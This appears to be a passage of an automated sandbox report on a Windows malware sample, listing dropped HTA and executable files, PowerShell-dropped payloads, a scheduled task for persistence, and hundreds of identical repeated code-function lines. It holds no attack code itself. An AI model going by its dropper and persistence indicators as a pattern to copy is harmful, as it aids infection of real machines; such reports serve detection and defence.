Source: C:\Windows\System32\cmd.exe	File created: C:\Temp\sJKQarzEf.hta
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	File created: C:\Users\user\AppData\Local\Temp\xsqWpWDz2.hta

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name:
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name: .idata
Source: 4CAJNBDWED5ZLJ2B.exe.0.dr	Static PE information: section name:
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name:
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name: .idata
Source: ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.0.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: .idata
Source: skotes.exe.3.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name: .idata
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: ede25bd9a2.exe.11.dr	Static PE information: section name:
Source: ede25bd9a2.exe.11.dr	Static PE information: section name: .idata
Source: ede25bd9a2.exe.11.dr	Static PE information: section name:
Source: random[2].exe1.11.dr	Static PE information: section name:
Source: random[2].exe1.11.dr	Static PE information: section name: .idata
Source: random[2].exe1.11.dr	Static PE information: section name:
Source: 298e6cea90.exe.11.dr	Static PE information: section name:
Source: 298e6cea90.exe.11.dr	Static PE information: section name: .idata
Source: 298e6cea90.exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.11.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name: .idata
Source: Fe36XBk[1].exe.11.dr	Static PE information: section name:
Source: Fe36XBk.exe.11.dr	Static PE information: section name:
Source: Fe36XBk.exe.11.dr	Static PE information: section name: .idata
Source: Fe36XBk.exe.11.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name: .idata
Source: Bjkm5hE[1].exe.11.dr	Static PE information: section name:
Source: Bjkm5hE.exe.11.dr	Static PE information: section name:
Source: Bjkm5hE.exe.11.dr	Static PE information: section name: .idata
Source: Bjkm5hE.exe.11.dr	Static PE information: section name:
Source: random[2].exe2.11.dr	Static PE information: section name:
Source: random[2].exe2.11.dr	Static PE information: section name: .idata
Source: random[2].exe2.11.dr	Static PE information: section name:
Source: 13426522e9.exe.11.dr	Static PE information: section name:
Source: 13426522e9.exe.11.dr	Static PE information: section name: .idata
Source: 13426522e9.exe.11.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C5B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

2_2_6C5B62C0

Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe	File created: C:\Windows\AttacksContacted

Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D3D5	0_3_0194D3D5
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0194D34E	0_3_0194D34E
